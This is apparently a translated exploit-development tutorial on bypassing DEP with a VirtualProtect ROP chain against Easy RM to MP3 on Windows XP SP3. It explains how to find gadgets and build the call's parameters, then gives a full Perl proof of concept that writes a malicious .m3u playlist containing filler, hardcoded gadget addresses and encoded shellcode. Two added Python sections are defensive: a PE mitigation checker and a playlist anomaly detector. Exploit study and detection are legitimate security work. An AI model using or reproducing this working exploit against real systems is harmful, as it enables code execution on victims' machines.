• VirtualProtect, method 2 - direct RET - DEP - Easy RM to MP3




This experiment has solved the problem of 00 (null) bytes in the gadget addresses.

The remaining problem is that a lot of system DLLs are used. The experiment was done on XP SP3~~~~

Example software: Easy RM to MP3 2.7.3.700~~~~~~~~~~~~~~~~~~~~~~~


ROP chain = many ROP gadgets

ROP gadget = one or a few instructions + ret

How to find ROP gadgets: 1 search directly for some instructions + ret; 2 find every ret and look backwards to see whether the preceding instructions fit what you need; 3 use a plugin to search

!pvefindaddr noaslr    find modules without ASLR

!pvefindaddr rop -m kernel32.dll nonull    // the rop option automatically skips ASLR modules
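The `noaslr` query above is the attacker's view of the same fact a defender has to audit: which modules in a process are loaded at a fixed image base, so that gadget addresses stay valid from run to run (XP SP3 has no ASLR at all, which is why every address in this chain is static). The following added example, not code from the original post, parses the two PE header fields that decide this on later Windows versions: IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE / NX_COMPAT in the optional header, and IMAGE_FILE_RELOCS_STRIPPED in the COFF header, which silently defeats DYNAMIC_BASE because the loader cannot relocate the image. The PE images it inspects are constructed headers-only images built in memory for the demonstration; on a real file call `pe_mitigations(open(path, "rb").read())`.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits (PE/COFF specification)
DYNAMIC_BASE = 0x0040      # image may be relocated at load time (ASLR)
NX_COMPAT = 0x0100         # image is DEP-compatible
HIGH_ENTROPY_VA = 0x0020   # 64-bit images: high-entropy ASLR
# IMAGE_FILE_* bits in the COFF header
RELOCS_STRIPPED = 0x0001   # no .reloc data: the loader cannot move the image even with DYNAMIC_BASE


def pe_mitigations(data: bytes) -> dict:
    """Parse just enough of a PE image to report its load-time mitigations."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 24-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                       # PE32: 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                     # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    dynamic_base = bool(dllchar & DYNAMIC_BASE)
    relocs_stripped = bool(characteristics & RELOCS_STRIPPED)
    return {
        "machine": machine,
        "image_base": image_base,
        "dynamic_base": dynamic_base,
        "relocs_stripped": relocs_stripped,
        "aslr_effective": dynamic_base and not relocs_stripped,
        "nx_compat": bool(dllchar & NX_COMPAT),
        "high_entropy_va": bool(dllchar & HIGH_ENTROPY_VA),
    }


def rop_risk_notes(info: dict) -> list:
    """Turn the parsed flags into the two findings that matter for a VirtualProtect ROP chain."""
    notes = []
    if not info["aslr_effective"]:
        notes.append("fixed image base 0x%X: gadget addresses are stable across loads" % info["image_base"])
    if not info["nx_compat"]:
        notes.append("not NX_COMPAT: the process may run with DEP disabled under OptIn/OptOut policy")
    return notes


def build_test_image(dll_characteristics, file_characteristics=0x2022,
                     image_base=0x7C800000, pe32plus=False) -> bytes:
    """Constructed headers-only PE image (no sections) used to exercise the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew -> PE header right after the DOS header
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x8664 if pe32plus else 0x14C,
                       0, 0, 0, 0, opt_size, file_characteristics)
    opt = bytearray(opt_size)
    if pe32plus:
        struct.pack_into("<H", opt, 0, 0x20B)
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<H", opt, 0, 0x10B)
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + coff + bytes(opt)


if __name__ == "__main__":
    # Constructed image bases: the first mirrors an XP-era kernel32 loaded at a fixed address.
    for name, image in (("legacy-dll", build_test_image(0x0000)),
                        ("hardened-dll", build_test_image(DYNAMIC_BASE | NX_COMPAT))):
        info = pe_mitigations(image)
        print(name, info, rop_risk_notes(info) or ["ok"])
```

The check that is easy to forget is `relocs_stripped`: a linker can set DYNAMIC_BASE on an image that has no relocation section, and the result is a module that reports ASLR support but always loads at its preferred base.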

Before building the parameters with gadgets, we can first construct them by hand to check that the VirtualProtect call actually succeeds.


Crafting the parameters:

1) the shellcode pointer: the simplest way is to put the address of ESP in a register and then increase it until it points at the shellcode; there may of course be other ways

2) the shellcode size

3) 0x40: set a register to a starting value and increase it until it holds 0x40, or find a register value that an add / sub turns into 0x40 and put the starting value in first

~~~~~ writing the constructed values back onto the stack dynamically: either increase ESP and overwrite, or write directly with mov dword ptr [reg+offset]

Stage 1) save the stack pointer, then skip over the parameters

For example (pseudocode below): when this has run we must arrive at XXXX with edi = eax = the original esp

    ret
    push esp,    pop edi,      ret
    push edi,     pop eax,      pop ebp,     ret
    add esp,0x20 ,               ret
    VirtualProtect address
    param1  return address
    param2  lpAddress
    param3  Size
    param4  flNewProtect
    param5  writeable address
    padding nop 8 bytes
    XXXX

Stage 2) craft the first parameter (the return address)

Build the start address of the shellcode, which is also the return address of VirtualProtect: once the function has marked the page executable it returns straight there

For example (pseudocode below)

    xchg esi,edi      #edx ecx   #ret 4
    add eax,0x100  pop ebp  ret
    padding nop 8 bytes
    mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret
    padding  nop  4 bytes

Tool: http://sourceforge.net/projects/unxutils/
To use Unix tools on Windows: almost all of the common Unix utilities have been ported as Windows executables. Download them, add the directory to the system PATH, and they can be used just like the built-in DOS commands. This way most Unix tools are available on Windows; users coming from Unix/Linux keep their habits and knowledge, native Windows users gain some productivity, and the commands are especially handy in Windows batch files.

    cat rop.txt | grep "MOV DWORD PTR DS:[ESI+10],EAX #MOV EAX,ESI"

Stage 3) craft the second parameter (lpAddress)

The same pointer can simply be reused, with a few changes

    push eax  # pop esi  #ret
    add eax,100  #pop ebx, ret
    padding nops 4 bytes
    add esi,4 + ret  / 4x  inc esi,ret
    mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret
    padding  nop  4 bytes

Stage 4) craft the third + fourth parameters (size + protection flag 0x40)

Set the third parameter to 0x300; the gadgets needed are xor eax,eax and add eax,0x100

Add 4 to ESI, write EAX to [esi+0x10]

The fourth parameter works much the same way

    push eax  # pop esi  #ret
    xor eax,eax  ret
    add eax,0x100  pop ebp
    padding  nop  4 bytes
    add eax,0x100  pop ebp
    padding  nop  4 bytes
    add eax,0x100  pop ebp
    padding  nop  4 bytes
    add esi,4 + ret  / 4x  inc esi,ret
    mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret
    padding  nop  4 bytes

    push eax  # pop esi  #ret
    xor eax,eax ret
    add eax,0x40  pop ebp ret
    padding  nop  4 bytes
    add esi,4 + ret  / 4x  inc esi,ret
    mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret
    padding  nop  4 bytes

    sub eax,4  # ret
    sub eax,4  # ret
    push eax, pop esp  mov eax,edi, pop edi, pop esi, ret

Finally place the shellcode and it runs~~~~~


Perl POC, full code:

    my $file = "exploits.m3u";   # perl

    my $junk = "\x41"x26075;


    my $ret = pack("V",0x7C80165E);   # RET

    my $padding = "x"x4;
    
    my $ajust = pack("V",0x771F8022);# PUSH ESP # MOV EAX,EDX # POP EDI # RETN  [Module : comctl32.dll]  **
    $ajust = $ajust.pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** 
    $ajust = $ajust."x"x4;
    $ajust = $ajust.pack("V",0x73DB2638); # ADD ESP,20 # RETN 4 	[Module : MFC42.DLL]  ** 
    
    my $AddressOfVirtualProtect = pack("V",0x7C801AD4);   #esp now 
    my $param1 = "1111";
    my $param2 = "2222";
    my $param3 = "3333";
    my $param4 = "4444";
    my $param5 = "5555";
    my $param = $param1.$param2.$param3.$param4.$param5."x"x8;
    #####################11111111111111111111111#########################################
    my $makeparam1 =  pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  save esi = original esp
    $makeparam1 = $makeparam1."x"x4; #top  RETN 4
    
    $makeparam1 = $makeparam1.pack("V",0x77BEE842);# PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam1 = $makeparam1."x"x4;
    
    $makeparam1 = $makeparam1.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
    $makeparam1 = $makeparam1."x"x4;
    $makeparam1 = $makeparam1.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
    $makeparam1 = $makeparam1."x"x4;
    
    # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  first param1 eax = address of shellcode
    $makeparam1 = $makeparam1.pack("V",0x73DC0270); 
    $makeparam1 = $makeparam1."x"x4;
    
    #####################22222222222222222222222#########################################
    my $makeparam2 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam2 = $makeparam2."x"x4; #top ret 4
    $makeparam2 = $makeparam2."x"x4;
    
    $makeparam2 = $makeparam2.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  save esi = original esp
    
    $makeparam2 = $makeparam2. pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  **   esi+4
    $makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    
    $makeparam2 = $makeparam2.pack("V",0x77BEE842);# PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam2 = $makeparam2."x"x4;
    $makeparam2 = $makeparam2.pack("V",0x77C1EC2B);# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
    $makeparam2 = $makeparam2."x"x4;
    $makeparam2 = $makeparam2.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
    $makeparam2 = $makeparam2."x"x4;
    
    # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param2 eax = address of shellcode
    $makeparam2 = $makeparam2.pack("V",0x73DC0270); 
    $makeparam2 = $makeparam2."x"x4; 
    
    #####################33333333333333333333333#########################################
    my $makeparam3 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam3 = $makeparam3."x"x4; #top ret 4
    $makeparam3 = $makeparam3."x"x4;
    $makeparam3 = $makeparam3.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  save esi = original esp
    $makeparam3 = $makeparam3.pack("V",0x5D174FB8);  # XOR EAX,EAX # RETN 	[Module : COMCTL32.dll]  ** 
    
    $makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax = 100
    $makeparam3 = $makeparam3."x"x4;
    
    $makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax =200
    $makeparam3 = $makeparam3."x"x4;
    
    $makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax = 300
    $makeparam3 = $makeparam3."x"x4;
    
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  **   esi+8
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    
    # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  param3 = 0x300 (size)
    $makeparam3 = $makeparam3.pack("V",0x73DC0270); 
    $makeparam3 = $makeparam3."x"x4; 
    
    #####################44444444444444444444444#########################################
    my $makeparam4 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam4 = $makeparam4."x"x4; #top ret 4
    $makeparam4 = $makeparam4."x"x4;
    $makeparam4 = $makeparam4.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  save esi = original esp
    $makeparam4 = $makeparam4.pack("V",0x5D174FB8);  # XOR EAX,EAX # RETN 	[Module : COMCTL32.dll]  ** 
    
    $makeparam4 = $makeparam4.pack("V",0x77C1EC1D);  # ADD EAX,40 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax =40
    $makeparam4 = $makeparam4."x"x4;
    
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  **   esi+0xc
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    
    # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  param4 = 0x40 (PAGE_EXECUTE_READWRITE)
    $makeparam4 = $makeparam4.pack("V",0x73DC0270); 
    $makeparam4 = $makeparam4."x"x4; 
    
    #####################55555555555555555555555#########################################
    my $makeparam5 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam5 = $makeparam5."x"x4; #top ret 4
    $makeparam5 = $makeparam5."x"x4;
    $makeparam5 = $makeparam5.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  save esi = original esp
    
    $makeparam5 = $makeparam5.pack("V",0x77BEE842);  # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
    $makeparam5 = $makeparam5."x"x4;
    
    $makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    $makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    $makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    $makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    $makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  **   esi+0x10
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    $makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
    
    
    # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  param5 = writeable address (lpflOldProtect)
    $makeparam5 = $makeparam5.pack("V",0x73DC0270); 
    $makeparam5 = $makeparam5."x"x4; 
    
    #####################just#########################################
    my $just = pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    $just = $just.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
    
    $just = $just.pack("V",0x5D19E24D);  # XCHG EAX,ESP # RETN 	[Module : COMCTL32.dll]  ** 
    $just = $just."x"x4; #top 4
    
    
    
    #shellcode start esp
    my $shellcode = "\x90"x76;
    $shellcode = $shellcode."\x81\xEF\xEE\xFD\xFF\xFF";    # SUB EDI,-212
    
    #shellcode start edi
    $shellcode = $shellcode."WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylaxrJTJP8Wn0h3SK98QpOe84rqdLQDLLKXtNmSNYdUckkoGdDFKKSsVoKvSp2RsaxcEPsU5Qbsd03N21tLKPZ4pNkqKflLKQKDLLKEKLKuKLKQKtXlKJKlmwMbJ5ZTxeNrUGuJ5KO1GZXJ550LKw57LlKPLWuQhUShMLKPYGPWskmvSKOQWlKttOKDCkEJ9dOoNVf4zzdBT7xKqKzc7gsJpqV8kJQukQDddglaezDLKSia4S3IMcVLKwLQkLKQIELESKmS3dloKlUqONKqGQqWMqzVjP8eNrUI9WC9KPSphpdQq6PWS586CpPpaBNnkKtRsPPpP2syo1GKL0SKORw";
    my $payload= $junk.$ret.$padding.$ajust.$AddressOfVirtualProtect.$param.$makeparam1. $makeparam2.$makeparam3.$makeparam4.$makeparam5.$just.$shellcode;
    
    print length($payload), "\n";
    open(my $FILE, ">", $file) or die "cannot open $file: $!";
    binmode($FILE);
    print $FILE $payload;
    close($FILE);
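The POC above writes a 26 KB playlist whose only "entry" is filler, a dozen reused code addresses and a NOP sled, which is nothing like the short path or URL lines a real .m3u contains. The added example below, not part of the original post, is a detection-side check a playlist parser or mail/download scanner could run before handing a file to the player: it measures line length, the longest run of a single byte, and 4-byte windows that contain non-text bytes and recur (a ROP chain repeats gadget addresses such as the INC ESI gadget sixteen times). Both samples are constructed here; the suspicious one copies only the shape of the page's payload and three of its addresses, with no shellcode.

```python
import struct
import string
from collections import Counter

# Bytes a legitimate playlist line may contain: printable ASCII plus whitespace.
TEXT_BYTES = frozenset(string.printable.encode())

MAX_LINE_LEN = 1024   # playlist entries are paths or URLs; anything far longer is filler
MAX_BYTE_RUN = 256    # a run of one repeated byte this long is padding, not a path
MIN_REPEATS = 4       # a non-text 4-byte value recurring this often looks like a reused gadget address


def analyze_m3u(data: bytes) -> dict:
    """Structural heuristics for an .m3u file; returns the measurements plus a verdict."""
    lines = data.split(b"\n")
    max_line_len = max(len(line) for line in lines)

    # Longest run of a single repeated byte (e.g. the 'A' filler that precedes a chain).
    longest_run = run = 1 if data else 0
    for prev, cur in zip(data, data[1:]):
        run = run + 1 if cur == prev else 1
        longest_run = max(longest_run, run)

    # Count every 4-byte window that is not plain text and not one repeated byte.
    # Code pointers almost always contain a control or high byte, and a ROP chain
    # reuses the same gadget address many times, so recurring values stand out.
    windows = Counter()
    for i in range(len(data) - 3):
        w = data[i:i + 4]
        if len(set(w)) > 1 and any(b not in TEXT_BYTES for b in w):
            windows[w] += 1
    repeated_dwords = {struct.unpack("<I", w)[0]: n
                       for w, n in windows.items() if n >= MIN_REPEATS}

    findings = []
    if max_line_len > MAX_LINE_LEN:
        findings.append("line of %d bytes exceeds %d" % (max_line_len, MAX_LINE_LEN))
    if longest_run > MAX_BYTE_RUN:
        findings.append("run of %d identical bytes" % longest_run)
    for value, n in sorted(repeated_dwords.items()):
        findings.append("non-text dword 0x%08X repeated %d times" % (value, n))

    return {
        "max_line_len": max_line_len,
        "longest_byte_run": longest_run,
        "repeated_dwords": repeated_dwords,
        "findings": findings,
        "suspicious": bool(findings),
    }


# Constructed samples (not files from the page). The second mimics the shape of the
# POC's payload: long filler, a few pointer-sized values (addresses taken from the
# page's chain, one repeated the way the INC ESI gadget is), then a NOP sled.
BENIGN_SAMPLE = b"#EXTM3U\r\nC:\\Music\\track01.mp3\r\nC:\\Music\\track02.mp3\r\n"
SUSPICIOUS_SAMPLE = (
    b"A" * 26075
    + struct.pack("<I", 0x7C80165E)
    + b"xxxx"
    + struct.pack("<I", 0x73DC8F7F) * 4
    + struct.pack("<I", 0x73DC0270)
    + b"\x90" * 76
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        result = analyze_m3u(sample)
        print(name, "suspicious" if result["suspicious"] else "clean")
        for finding in result["findings"]:
            print("  -", finding)
```

The three thresholds are deliberately coarse: the aim is to reject a file that cannot be a playlist before the vulnerable parser ever copies it into its fixed-size buffer, not to recognise a particular chain. Non-ASCII bytes alone are not used for the verdict because UTF-8 paths are legitimate playlist content.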
    




















• Original article: https://www.cnblogs.com/zcc1414/p/3982345.html